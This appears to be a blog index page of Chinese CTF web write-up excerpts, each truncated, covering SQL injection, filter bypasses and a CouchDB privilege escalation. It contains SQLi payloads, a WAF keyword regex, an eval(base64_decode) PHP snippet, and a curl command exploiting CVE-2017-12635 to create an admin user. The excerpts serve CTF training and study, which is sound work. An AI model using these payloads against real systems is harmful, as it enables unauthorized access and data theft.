题目1234567891011121314151617181920eval(function(p, a, c, k, e, d) { e = function(c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) d[e(c)] ...
前记最近发现了一个练习网站~于是先做sql喽~,好的题目我会标注good question,233333方便日后自己研究,也帮大佬们省去看基础题的时间啦~
Most basic SQLi pattern.(point 1)签到题:12username: admin'#password: 1
可以得到flag:FLAG-238974289383274893
ACL rulezzz the world.(point 2)随手测试1username=admin'
得到1You have an error in your SQL syntax; check the manua...
前记打完比赛后一直在享受最后的假期……就没迅速写题解= =,不过这次web的难度不是很大,除了ambulong大佬的xss+csrf的题= =,所以我也就写的很随意了……
应该不是XSS向来前端题就是我的软肋,这次还是没做出来,挺遗憾的后面有些眉目的时候我的公网ip崩了,导致没能继续做下去……希望以后可以提高xss和csrf类型题目的能力吧非预期:http://forum.91ctf.com/index.php/group/topic/id-37官方解:http://forum.91ctf.com/index.php/group/topic/id-39
PING盲打rce,我还是利用了c...
又双叒叕是SQLI发现文件泄露index.php~12345678910111213141516171819202122232425<?php error_reporting(0); include("sql.php"); $waf="/(union|group by|=|>|<|hex| |lower|strcmp|updatexml|xmlelement|extractvalue|concat|bin|sleep|mid\(|substr|left|ascii|\/\*|\*\/)/i"; if(isset($_GET['user']))&#...
前言年终于算是过完了,闲下来做了一下hgame的week3,感觉还是挺简单的,题目比较传统,就粗略记录一下了,前两周的就不记录了,容易太多了
week3-送分的SQLi太简单不细说了payload:1http://118.25.18.223:10068/?id=-1%20union%20select%201,(select%20f111aaaggg_w3%20from%20f111aa4g)
得到flag:1hgame{Th3_e4sist_sql_injeCti0n##}
week3-正常的SQLi有文件泄露index.php.bak1234567891011<...
前言临近除夕,CTF首页也变的这么皮了吗…….jpg”>
是时候让你手指锻炼一下了打开页面源代码12345678910111213141516171819202122var clicks=0$(function() { $("#cookie") .mousedown(function() { $(this).width('350px').height('350px'); }) .mouseup(function() { $(this).widt...
前记以前校赛的时候出了一道skysql灵感来自于bendawang师傅的一篇博客(像巨佬致敬orz)今天正好有空写了一下题解
题目解法题目过滤比较严格盲注和报错注入都不太容易实现但是不难发现单个fuzz的话union和select都没有被过滤但是联合一起的话,union select是被过滤的所以我可以猜想他的waf正则写法是:1|union select|
所以我们可以尝试绕过1union%0bselect
此时发现union select是可以用的但是问题又出现了:没有逗号那么如何解决呢?这里也是比较长谈的绕过问题了我们先看正常使用的时候.jpg”>而当逗号被过滤时,我们可以使...
PHPreading发现文件泄露1http://198.13.58.35:8899/index.php.bak
内容123<?php eval(base64_decode('JGZsYWc9JF9HRVRbJ2FzZGZnanh6a2FsbGdqODg1MiddO2lmKCRmbGFnPT0nSDFUY3RGMjAxOEV6Q1RGJyl7ZGllKCRmbGFnKTt9ZGllKCdlbW1tbScpOw=='))?>
解码得到1$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018Ez...
签到加群就有flag就不说啦(滑稽脸)xishir师傅弄的oj,打电话打电话!!
一道水题f12源代码里就有flag,23333
还是水题常规的前端1<input type="password" value="" disabled="disabled" name="password" maxlength="4">
改一下限制就行啦,改成5,输入moctf就有flag
访问限制抓包,然后发包12345678GET /web3/ HTTP/1.1Host: 119.23.73.3:...
CVE-2017-12635(CouchDB)拿到题目后发现80端口无法访问,于是扫了一波端口发现5984开放搜了一下,发现是CouchDB漏洞然后发现2017的CVE:CVE-2017-12635可以创建一个管理员用户1curl -X PUT 'http://192.168.5.39:5984/_users/org.couchdb.user:sky' --data-binary '{"type": "user","name": "sky","roles&qu...
